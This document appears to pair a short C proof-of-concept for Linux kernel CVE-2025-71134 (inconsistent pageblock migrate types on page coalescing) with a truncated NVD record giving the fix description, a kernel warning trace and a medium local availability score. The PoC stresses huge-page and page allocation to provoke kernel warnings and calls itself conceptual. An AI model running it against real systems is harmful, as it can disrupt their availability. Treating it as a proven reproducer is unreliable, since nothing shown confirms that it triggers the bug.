CVE-2025-71134

/* * PoC for CVE-2025-71134: Linux kernel pageblock migratetype inconsistency * This PoC triggers the page allocation path that exposes the migratetype mismatch * * Compile: gcc -o cve_2025_71134_poc cve_2025_71134_poc.c -Wall * Run as root on vulnerable kernel * * Note: This is a conceptual PoC. Actual exploitation requires kernel debugging. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <errno.h> #define PAGE_SIZE 4096 #define HUGE_PAGE_ORDER 8 /* 256 pages = 1MB */ /* Trigger THP allocation which internally uses rmqueue paths */ void trigger_thp_allocation(void) { void *addr; int ret; /* Request THP (Transparent Huge Page) allocation */ addr = mmap(NULL, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0); if (addr == MAP_FAILED) { /* Fallback: try MADV_HUGEPAGE */ addr = mmap(NULL, 2 * 1024 * 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (addr != MAP_FAILED) { madvise(addr, 2 * 1024 * 1024, MADV_HUGEPAGE); memset(addr, 0x41, 2 * 1024 * 1024); printf("THP allocation triggered\n"); } } else { printf("HugeTLB allocation successful at %p\n", addr); memset(addr, 0x42, 2 * 1024 * 1024); } if (addr != MAP_FAILED) { /* Free in specific pattern to trigger coalescing */ munmap(addr, 2 * 1024 * 1024); } } /* Stress memory allocator to trigger pageblock fragmentation */ void stress_allocator(void) { void *ptrs[64]; int i; for (i = 0; i < 64; i++) { ptrs[i] = mmap(NULL, PAGE_SIZE * 512, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (ptrs[i] != MAP_FAILED) { memset(ptrs[i], 0xAA, PAGE_SIZE * 512); } } /* Free alternating pages to create migration type mismatch */ for (i = 0; i < 64; i += 2) { if (ptrs[i] != MAP_FAILED) { munmap(ptrs[i], PAGE_SIZE * 512); ptrs[i] = NULL; } } /* Reallocate to trigger coalescing with mixed pageblocks */ for (i = 0; i < 64; i += 2) { if (ptrs[i] == NULL) { ptrs[i] = mmap(NULL, PAGE_SIZE * 512, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); } } /* Cleanup */ for (i = 0; i < 64; i++) { if (ptrs[i] != NULL) { munmap(ptrs[i], PAGE_SIZE * 512); } } } int main(int argc, char *argv[]) { printf("CVE-2025-71134 PoC - Linux Kernel pageblock migratetype issue\n"); printf("======================================================\n"); if (geteuid() != 0) { printf("Warning: This PoC should be run as root for full effect\n"); } printf("Triggering THP allocation stress...\n"); for (int i = 0; i < 10; i++) { trigger_thp_allocation(); usleep(100000); } printf("Stress testing memory allocator...\n"); for (int i = 0; i < 5; i++) { stress_allocator(); usleep(100000); } printf("PoC execution complete. Check dmesg for WARNING messages.\n"); return 0; }

{"cve": {"id": "CVE-2025-71134", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:03.167", "lastModified": "2026-03-25T18:03:56.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/page_alloc: change all pageblocks migrate type on coalescing\n\nWhen a page is freed it coalesces with a buddy into a higher order page\nwhile possible. When the buddy page migrate type differs, it is expected\nto be updated to match the one of the page being freed.\n\nHowever, only the first pageblock of the buddy page is updated, while the\nrest of the pageblocks are left unchanged.\n\nThat causes warnings in later expand() and other code paths (like below),\nsince an inconsistency between migration type of the list containing the\npage and the page-owned pageblocks migration types is introduced.\n\n[ 308.986589] ------------[ cut here ]------------\n[ 308.987227] page type is 0, passed migratetype is 1 (nr=256)\n[ 308.987275] WARNING: CPU: 1 PID: 5224 at mm/page_alloc.c:812 expand+0x23c/0x270\n[ 308.987293] Modules linked in: algif_hash(E) af_alg(E) nft_fib_inet(E) nft_fib_ipv4(E) nft_fib_ipv6(E) nft_fib(E) nft_reject_inet(E) nf_reject_ipv4(E) nf_reject_ipv6(E) nft_reject(E) nft_ct(E) nft_chain_nat(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) nf_tables(E) s390_trng(E) vfio_ccw(E) mdev(E) vfio_iommu_type1(E) vfio(E) sch_fq_codel(E) drm(E) i2c_core(E) drm_panel_orientation_quirks(E) loop(E) nfnetlink(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vsock(E) ctcm(E) fsm(E) diag288_wdt(E) watchdog(E) zfcp(E) scsi_transport_fc(E) ghash_s390(E) prng(E) aes_s390(E) des_generic(E) des_s390(E) libdes(E) sha3_512_s390(E) sha3_256_s390(E) sha_common(E) paes_s390(E) crypto_engine(E) pkey_cca(E) pkey_ep11(E) zcrypt(E) rng_core(E) pkey_pckmo(E) pkey(E) autofs4(E)\n[ 308.987439] Unloaded tainted modules: hmac_s390(E):2\n[ 308.987650] CPU: 1 UID: 0 PID: 5224 Comm: mempig_verify Kdump: loaded Tainted: G E 6.18.0-gcc-bpf-debug #431 PREEMPT\n[ 308.987657] Tainted: [E]=UNSIGNED_MODULE\n[ 308.987661] Hardware name: IBM 3906 M04 704 (z/VM 7.3.0)\n[ 308.987666] Krnl PSW : 0404f00180000000 00000349976fa600 (expand+0x240/0x270)\n[ 308.987676] R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:3 PM:0 RI:0 EA:3\n[ 308.987682] Krnl GPRS: 0000034980000004 0000000000000005 0000000000000030 000003499a0e6d88\n[ 308.987688] 0000000000000005 0000034980000005 000002be803ac000 0000023efe6c8300\n[ 308.987692] 0000000000000008 0000034998d57290 000002be00000100 0000023e00000008\n[ 308.987696] 0000000000000000 0000000000000000 00000349976fa5fc 000002c99b1eb6f0\n[ 308.987708] Krnl Code: 00000349976fa5f0: c020008a02f2\tlarl\t%r2,000003499883abd4\n 00000349976fa5f6: c0e5ffe3f4b5\tbrasl\t%r14,0000034997378f60\n #00000349976fa5fc: af000000\t\tmc\t0,0\n >00000349976fa600: a7f4ff4c\t\tbrc\t15,00000349976fa498\n 00000349976fa604: b9040026\t\tlgr\t%r2,%r6\n 00000349976fa608: c0300088317f\tlarl\t%r3,0000034998800906\n 00000349976fa60e: c0e5fffdb6e1\tbrasl\t%r14,00000349976b13d0\n 00000349976fa614: af000000\t\tmc\t0,0\n[ 308.987734] Call Trace:\n[ 308.987738] [<00000349976fa600>] expand+0x240/0x270\n[ 308.987744] ([<00000349976fa5fc>] expand+0x23c/0x270)\n[ 308.987749] [<00000349976ff95e>] rmqueue_bulk+0x71e/0x940\n[ 308.987754] [<00000349976ffd7e>] __rmqueue_pcplist+0x1fe/0x2a0\n[ 308.987759] [<0000034997700966>] rmqueue.isra.0+0xb46/0xf40\n[ 308.987763] [<0000034997703ec8>] get_page_from_freelist+0x198/0x8d0\n[ 308.987768] [<0000034997706fa8>] __alloc_frozen_pages_noprof+0x198/0x400\n[ 308.987774] [<00000349977536f8>] alloc_pages_mpol+0xb8/0x220\n[ 308.987781] [<0000034997753bf6>] folio_alloc_mpol_noprof+0x26/0xc0\n[ 308.987786] [<0000034997753e4c>] vma_alloc_folio_noprof+0x6c/0xa0\n[ 308.987791] [<0000034997775b22>] vma_alloc_anon_folio_pmd+0x42/0x240\n[ 308.987799] [<000003499777bfea>] __do_huge_pmd_anonymous_page+0x3a/0x210\n[ 308.987804] [<00000349976cb0\n---truncated---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate" ... (truncated)